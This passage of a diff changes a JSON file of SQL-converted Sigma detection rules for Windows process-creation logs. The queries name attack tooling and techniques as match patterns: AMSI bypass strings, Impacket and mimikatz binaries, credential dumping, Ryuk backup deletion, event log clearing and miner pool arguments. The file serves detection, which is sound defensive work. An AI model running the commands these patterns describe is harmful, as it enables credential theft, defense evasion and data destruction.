"SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_winrm_susp_child_process.yml" + "filename": "proc_creation_win_cmd_shadowcopy_access.yml" }, { - "title": "Potential Crypto Mining Activity", - "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", - "status": "stable", - "description": "Detects command line parameters or strings often used by crypto miners", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Schtasks Execution AppData Folder", + "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", + "status": "experimental", + "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", + "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.impact", - "attack.t1496" + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of crypto miners", - "Some build frameworks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_crypto_mining_monero.yml" + "filename": "proc_creation_win_schtasks_appdata_local_system.yml" }, { - "title": "Potential CommandLine Path Traversal Via Cmd.EXE", - "id": "087790e3-3287-436c-bccf-cbd0184a7db1", + "title": "Suspicious WmiPrvSE Child Process", + "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", "status": "test", - "description": "Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking", - "author": "xknow @xknow_infosec, Tim Shelton", + "description": "Detects suspicious and uncommon child processes of WmiPrvSE", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.003" + "attack.defense_evasion", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ - "Java tools are known to produce false-positive when loading libraries" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\')))) AND NOT ((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_path_traversal.yml" + "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" }, { - "title": "Ping Hex IP", - "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", - "status": "test", - "description": "Detects a ping command that uses a hex encoded IP address", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Elevated System Shell", + "id": "178e615d-e666-498b-9630-9ed363038101", + "status": "experimental", + "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", + "author": "frack113, Tim Shelton (update fp)", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1140", - "attack.t1027" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND SubjectLogonId = '0x3e7')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c btool server list general --no-log' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\system32\\\\reg.exe query hklm\\\\software\\\\microsoft\\\\windows\\\\softwareinventorylogging /v collectionstate /reg:64%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /c PAUSE' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ping_hex_ip.yml" + "filename": "proc_creation_win_susp_elevated_system_shell.yml" }, { - "title": "Potential ACTINIUM Persistence Activity", - "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", - "status": "test", - "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", - "author": "Andreas Hunkeler (@Karneades)", + "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", + "id": "b66474aa-bd92-4333-a16c-298155b120df", + "status": "experimental", + "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", + "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_actinium_persistence.yml" + "filename": "proc_creation_win_schtasks_powershell_persistence.yml" }, { - "title": "Suspicious Eventlog Clear or Configuration Change", - "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", - "status": "stable", - "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", - "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", + "title": "Disable Important Scheduled Task", + "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", + "status": "experimental", + "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "attack.t1562.002", - "car.2016-04-002" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Maintenance activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_eventlog_clear.yml" + "filename": "proc_creation_win_schtasks_disable.yml" }, { - "title": "Potential AMSI Bypass Via .NET Reflection", - "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", + "title": "Explorer NOUACCHECK Flag", + "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", "status": "test", - "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", - "author": "Markus Neis, @Kostastsale", + "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Domain Controller User Logon", + "Unknown how many legitimate software products use that method" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" + "filename": "proc_creation_win_explorer_nouaccheck.yml" }, { - "title": "HackTool - Impacket Tools Execution", - "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", - "status": "test", - "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Defense Evasion Via Right-to-Left Override", + "id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", + "status": "experimental", + "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", + "author": "Micah Babinski, @micahbabinski", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.defense_evasion", + "attack.t1036.002" ], "falsepositives": [ - "Legitimate use of the impacket tools" + "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\goldenPac%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\kintercept%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rpcdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\samrdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\secretsdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmiexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opdump\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%‮%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_impacket_tools.yml" + "filename": "proc_creation_win_susp_right_to_left_override.yml" }, { - "title": "Interactive AT Job", - "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", - "status": "test", - "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Potential Ryuk Ransomware Activity", + "id": "c37510b8-2107-4b78-aa32-72f251e7a844", + "status": "stable", + "description": "Detects Ryuk ransomware activity", + "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1053.002" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely (at.exe deprecated as of Windows 8)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_at_interactive_execution.yml" + "filename": "proc_creation_win_malware_ryuk.yml" }, { - "title": "HackTool - Pypykatz Credentials Dumping Activity", - "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", - "status": "test", - "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", - "author": "frack113", + "title": "Set Suspicious Files as System Files Using Attrib.EXE", + "id": "efec536f-72e8-4656-8960-5e85d091345b", + "status": "experimental", + "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_pypykatz.yml" + "filename": "proc_creation_win_attrib_system_susp_paths.yml" }, { - "title": "Root Certificate Installed From Susp Locations", - "id": "5f6a601c-2ecb-498b-9c33-660362323afa", - "status": "experimental", - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Bloodhound/Sharphound Execution", + "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "status": "test", + "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Other programs that use these command line option and accepts an 'All' parameter" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE 